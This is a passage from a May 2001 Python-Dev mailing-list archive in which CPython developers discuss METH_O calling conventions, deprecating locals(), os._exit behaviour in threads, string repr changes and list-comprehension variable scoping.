METH_O > candidate anyway. Indeed, Martin's patch gives a *better* message than we > get for some mistakes today: > > >>> len(val=2) > Yraceback (most recent call last): > File "", line 1, in ? > TypeError: len() takes exactly 1 argument (0 given) > >>> > > Martin's would say > > TypeError: len takes no keyword arguments > > in this case. He should add "()" after the function name. He should also > throw away the half of the patch complicating and slowing METH_O to get some > theoretical speedup in other cases: make the one-arg builtins fly just as > fast as humanly possible. If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack. In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value). This would take care of most builtins: Python/bltinmodule.c: -- if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq)) -- if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b)) -- if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt)) -- if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value)) -- if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z)) -- if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result)) -- if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls)) -- if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls)) -- if (!PyArg_ParseTuple(args, "O:abs", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict)) -- if (!PyArg_ParseTuple(args, "O:callable", &v)) -- if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i)) -- if (!PyArg_ParseTuple(args, "O:id", &v)) -- if (!PyArg_ParseTuple(args, "O:hash", &v)) -- if (!PyArg_ParseTuple(args, "O:hex", &v)) -- if (!PyArg_ParseTuple(args, "O:float", &v)) -- if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w)) -- if (!PyArg_ParseTuple(args, "O:len", &v)) -- if (!PyArg_ParseTuple(args, "O:list", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step)) -- else if (!PyArg_ParseTuple(args, "O:min/max", &v)) -- if (!PyArg_ParseTuple(args, "O:oct", &v)) -- if (!PyArg_ParseTuple(args, "O:ord", &obj)) -- if (!PyArg_ParseTuple(args, "O:reload", &v)) -- if (!PyArg_ParseTuple(args, "O:repr", &v)) -- if (!PyArg_ParseTuple(args, "O:str", &v)) -- if (!PyArg_ParseTuple(args, "O:tuple", &v)) -- if (!PyArg_ParseTuple(args, "O:type", &v)) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Mon May 28 18:45:27 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 28 May 2001 12:45:27 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: <15122.32935.53414.174221@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: >> How is METH_O different than METH_OLDARGS? MvL> METH_O will raise an exception if the function is called with MvL> more than one argument, without calling the MvL> function. METH_OLDARGS will pass a tuple in this case. Yes, I see that now. I'm +1 on METH_O, then. Jeremy From tim.one at home.com Mon May 28 19:23:47 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 13:23:47 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I believe you cannot distinguish between a single tuple argument and > an invocation with multiple arguments in a METH_OLDARGS function, is > that true? That's the conclusion I reached after staring at the code.. From fdrake at acm.org Mon May 28 20:20:01 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:20:01 -0400 (EDT) Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: References: Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Andrew Kuchling writes: > Looking at a bug report Fred forwarded, I realized that after > py-howto.sourceforge.net was set up, www.python.org/doc/howto was > never changed to redirect to the SF site instead. As of this > afternoon, that's now done; links on www.python.org have been updated, > and I've added the redirect. > > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgetten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Mon May 28 20:33:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the docummentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one at home.com Tue May 29 01:42:05 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the docummentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing def f(...): ... print "..." % locals() to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one at home.com Tue May 29 02:01:33 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring. I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one at home.com Tue May 29 02:42:54 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one at home.com Tue May 29 03:14:16 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one at home.com Tue May 29 03:49:29 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) [TIm] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg at cosc.canterbury.ac.nz Tue May 29 04:12:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Tue May 29 04:33:58 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From jepler at mail.inetnebr.com Tue May 29 04:32:05 2001 From: jepler at mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads." Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program". In fact, a traceback from the hung "sleep(1)" thread shows (gdb) where #0 0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45 #1 0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934 #2 0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34 #3 0x08067ba0 in PyThread_acquire_lock () at eval.c:41 #4 0x08051ff1 in PyEval_RestoreThread () at eval.c:41 #5 0x40019ef9 in floatsleep () at eval.c:41 #6 0x400193fd in time_sleep () at eval.c:41 [...] While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition. Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any. Jeff From tim.one at home.com Tue May 29 06:03:38 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:03:38 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010528213205.A1236@localhost.localdomain> Message-ID: [Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ] > My reasoning: The documentation for _exit() says it is "used to exit the > child process after a fork()", and my model for thinking about threads > is that they're "child processes, but ...". Thus, invoking os._exit() > in a thread made sense to me, meaning "ask the OS to destroy this thread > now, but leave my file descriptors, etc., alone for the other threads." You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (aee the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it. > Your suggestion in the tracker of writing the equivalent C program is a > good one, though my suspicion (which I did not voice in the SF report) > was that perhaps the thread which called _exit() held the GIL, in which > case it was in some sense Python's fault that execution didn't continue. Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process. But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it. > ... > Of course, if os._exit() has no intended use in a threaded program, Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences. > then this behavior is as good as any. And better than most . From tim.one at home.com Tue May 29 06:16:46 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:16:46 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> Message-ID: [Martin] > I took a special look at METH_OLDARGS occurrences. [GregE] > Shouldn't all these be removed? I would have thought > list.append was the last one! I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args: >>> {}.clear(2) # complains Traceback (most recent call last): File "", line 1, in ? TypeError: function takes no arguments >>> {}.clear(val=12, hohoho=666) # accepts nonsense silently >>> the-more-you-look-the-messier-it-gets-ly y'rs - tim From tim.one at home.com Tue May 29 08:06:19 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:06:19 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org> Message-ID: ESR> Apparently the Universe is an even more random place than I ESR> thought. [Barry A. Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one at home.com Tue May 29 08:15:07 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg at aol.com > -----Original Message----- > From: python-list-admin at python.org > [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list at python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh at python.net Tue May 29 10:00:42 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one at home.com Tue May 29 10:04:48 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas at xs4all.net Tue May 29 11:52:01 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list at python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From akuchlin at mems-exchange.org Tue May 29 16:04:37 2001 From: akuchlin at mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz at rahul.net Tue May 29 17:47:13 2001 From: aahz at rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. from threading import Thread import os class Foo(Thread): def run(self): while 1: pass f = Foo() f.start() os._exit(1) From beazley at cs.uchicago.edu Tue May 29 18:56:09 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Tue, 29 May 2001 11:56:09 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time... First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue: When I write a list comprehension like this: s = [ expr(x) for x in t ] it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error: # Some loop for x in r: ... # bunch of statements ... s = [expr(x) for x in t] ... # Try to do something with x. # ???? What in the hell is wrong with my program ???? ... The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-). Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example: s = [expr(x) for x in t] would get expanded into something roughly like this: s = [ ] for _mangled_x in t: s.append(expr(_mangled_x)) del _mangled_x Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either. Comments? Cheers, Dave From nas at python.ca Tue May 29 19:01:41 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 29 May 2001 10:01:41 -0700 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529100141.B18974@glacier.fnational.com> David Beazley wrote: > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though. Neil From skip at pobox.com Tue May 29 21:03:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Tue, 29 May 2001 14:03:47 -0500 Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd) Message-ID: <15123.62099.473259.545781@beluga.mojam.com> I pass this along in case anyone here has some ideas for Jeff about how to workaround his problems with pyexpat.c. Skip -------------- next part -------------- An embedded message was scrubbed... From: Jeff Rush Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 Size: 3437 URL: From gward at python.net Tue May 29 23:21:55 2001 From: gward at python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics. Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp at ActiveState.com Tue May 29 23:55:03 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim at digicool.com Wed May 30 00:54:01 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the 